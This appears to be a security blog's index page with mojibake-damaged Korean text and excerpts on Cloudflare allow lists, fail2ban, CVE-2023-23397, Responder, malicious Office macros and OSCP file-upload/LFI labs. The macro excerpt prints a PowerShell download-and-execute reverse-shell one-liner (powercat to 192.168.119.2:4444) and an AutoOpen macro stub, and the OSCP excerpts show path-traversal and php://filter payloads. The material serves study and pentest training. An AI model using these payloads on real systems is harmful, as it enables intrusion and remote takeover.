728x90 ์ ์ฒด ๊ธ743 ์ํ์น - ํด๋ผ์ฐ๋ ํ๋ ์ด ์์ดํผ๋ง ์ ๊ทผ ํ์ฉ(.htaccess) nano /var/www/html/.htaccess deny from allallow from 173.245.48.0/20allow from 103.21.244.0/22allow from 103.22.200.0/22allow from 103.31.4.0/22allow from 141.101.64.0/18allow from 108.162.192.0/18allow from 190.93.240.0/20allow from 188.114.96.0/20allow from 197.234.240.0/22allow from 198.41.128.0/17allow from 162.158.0.0/15allow from 104.16.0.0/13allow from 104.24.0.0/14allow from 172.64.0.0/1.. 2025. 8. 27. ๋ฆฌ๋ ์ค - ssh ๋ก๊ทธ์ธ ํ์ ์ด๊ณผ IP ์ฐจ๋จ(fail2ban) fail2ban ํจํค์ง ์ค์นsudo apt updatesudo apt install fail2ban -y ์ค์ ํ์ผ ์์ (โปjail.conf๋ ๋ฐฑ์ ์ฉ, ์ค์ ์ค์ ์ jail.local)sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local fail2ban ์ค์ sudo nano /etc/fail2ban/jail.local [sshd]enabled = trueport = sshfilter = sshdlogpath = /var/log/auth.logmaxretry = 3bantime = 48hfindtime = 10m maxretry: ํ์ฉํ ์ต๋ ๋ก๊ทธ์ธ ์คํจ ํ์bantime: ์ฐจ๋จ ์๊ฐ(100 = 100์ด, 10m = 10๋ถ, 1h = 1์๊ฐ)findtime.. 2025. 8. 20. ํด๋ผ์ฐ๋ ํ๋ ์ด ์ค์ ํ 522 ์๋ฌ ๋ฐ์ ์์ธ ์น ์๋ฒ์ SSL ์ธ์ฆ์ ์ง์ํ์ง ์๋ ๊ฒฝ์ฐ(HTTP/80๋ง ์ด์ฉ ์ค์ธ ๊ฒฝ์ฐ) ์น ์๋ฒ์ ํด๋ผ์ฐ๋ ํ๋ ์ด ์๋ก๊ฐ ์ค๋ฅ๊ฐ ์๊ธฐ๊ฒ ๋จ ํด๊ฒฐ) SSL/TLS ์ํธํ > ํ์ฌ ์ํธํ ๋ชจ๋๊ฐ "๊ฐ๋ณ"์ด์ด์ผ ํจ 2025. 8. 18. Flipper Zero - ํค์ (keygen.co) https://keygen.co/ keygenkeygen generates working, high-quality 3D-printable models of keys based on given parameters. Select a key type to get started. Please wait... keygen generates working, high-quality 3D-printable models of keys based on given parameters. To generate a key,keygen.co 2025. 8. 17. java.security.cert.certpathvalidatorexception trust anchor for certification ์๋ฌ ISRG Root X1 ํน์ ISRG Root X2 .pem ํ์ผ ์ค์นhttps://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org์ถ์ฒ: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13. ๋ชจ๋ ์ธ์ฝ๋ฉ ๋์ฝ๋ฉ ๋ฌธ์ ํ์ธ ์ฌ์ดํธ(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5. ๋ธ๋๋ฒ ๋ฆฌ - bar ์ค์น ๊ด๋ จ ๋งํฌ BAR ํ์ผ ์ค์น ํ๋ก๊ทธ๋จhttps://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com ํฐ๋ฏธ๋ ์ฑ(term-48) ์์นด์ด๋ธ ์ฃผ์https://archive.org/details/term-48_bb10 2025. 7. 30. ์ทจ์ฝ์ ๋ถ์ - CVE-2023-23397 CVE-2023-23397 ์ทจ์ฝ์ ์ ๋ณดCVE-2023-23397๋ Microsoft Windows ์ ์ฉ Outlook์ ์ฝ์์ ์๋ ค์ฃผ๋ ‘๋ฏธ๋ฆฌ ์๋ฆผ’ ๊ธฐ๋ฅ์ ์ฌ์ํ ์ฌ์ด๋ ํ์ผ์ ๋ถ๋ฌ์ค๊ธฐ ์ํด์ ๊ณต๊ฒฉ์์ SMB ์๋ฒ๋ก ์ธ์ฆํ๋ ๊ณผ์ ์ NTLM ์๊ฒฉ ์ฆ๋ช ์ ํ์ทจ๋๋ ๊ถํ ์์น ์ทจ์ฝ์ ์ ๋๋ค.ํด๋น ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ถํ ์์น์ด ์ด๋ฃจ์ด์ ธ ๋ ํฐ ํผํด๊ฐ ๋ฐ์ํ ์ ์์ ์ ๋๋ก ์ํ๋๋ ๋ค์ ๋์ ๊ฒ์ผ๋ก ์์๋ฉ๋๋ค.์กฐ์น ๋ฐฉ์์ผ๋ก Outlook์ Build 16130.20306 ์ด์์ผ๋ก ์ ๋ฐ์ดํธ๊ฐ ํ์ํ๋ฉฐ, SMB ์๋น์ค๋ฅผ ์ด์ฉํ์ง ์์ ๊ฒฝ์ฐ์๋ ํด๋น ์๋น์ค๋ฅผ ๋นํ์ฑํ ํ๊ฑฐ๋ SMB TCP/445 ํฌํธ ์์๋ฐ์ด๋๋ฅผ ์ฐจ๋จํฉ๋๋ค.CVE Number CVE-2023-23397CVSS Score9.8severity(์ฌ๊ฐ๋).. 2025. 7. 27. ์ทจ์ฝ์ ๋ถ์ - NTLM ํฌ๋ฆฌ๋ด์ ํจํท ์ค๋ํผ (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com ์ฌ์ฉ ์์... 2025. 7. 27. ์ ์ฑ์ฝ๋ ๋ถ์ - ๋งคํฌ๋ก ๋ฌธ์ ์ ์ฑ ํ์ผ IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')์ฒญํฌํ(๋ฌธ์์ด์ด ๋๋ฌด ๊ธธ๋ฉด ์ค๋ฅ๊ฐ ๋ฐ์) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26. OSCP - 9.3.2. Using Non-Executable Files ํ์ผ ์ ๋ก๋ ์ ์คํ์ด ๋ถ๊ฐ๋ฅํ ๊ฒฝ์ฐ(e.g. ์คํ ๊ถํ์ด ์๋ ์ ๋ก๋ ํด๋)์ ์ฌ์ฉํ ์ ์๋ ์ทจ์ฝ์ ๋ถ์ ๋ฐฉ๋ฒ์ ์์๋ณธ๋ค. ์ฐ์ ํ์ผ ์ ๋ก๋ ์ filename์ ๋งค๊ฐ๋ณ์๋ฅผ ์กฐ์ํ์ฌ ../../../../../../../test.txt๋ฅผ ๋ฃ์ด ์๋ฒ๋ก ์ ๋ฌํ ๊ฒฝ์ฐ ์๋ฒ ์ธก์ด ์ ์ ์๋ต์ ํ ๊ฒฝ์ฐ ์ทจ์ฝ ๊ฐ๋ฅ์ฑ์ด ์์ ์ ์๋ค. ํนํ ์ฌ๊ธฐ์ ๋ฃจํธ(/) ๊ฒฝ๋ก์์๋ ์ ์ ์ ๋ก๋ ๋ ๊ฒ์ด๋ผ๋ฉด root์ ํ๋๋ ํฐ๋ฆฌ๋ ์ง์ ์ ๊ทผ์ด ๊ฐ๋ฅํจ์ ์ ์ ์๋ค. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22. OSCP - 9.2.2. PHP Wrappers admin.php ํ์ผ ๋ด์ฉkali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. ๋ค์๊ณผ ๊ฐ์ด LFI๊ฐ ๋ฐ์ํ๋ ๊ฒฝ์ฐ(์ ๋ ฅ ๊ฒ์ฆ ์์ด ๋ฐ๋ก include ์คํ => include $_GET["page"];)PHP Wrappers์ ์ทจ์ฝํ ์ ์๋ค. admin.php ํ์ด์ง base64 ์ธ์ฝ๋ฉ(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21. ์ด์ 1 2 3 4 ยทยทยท 62 ๋ค์ 728x90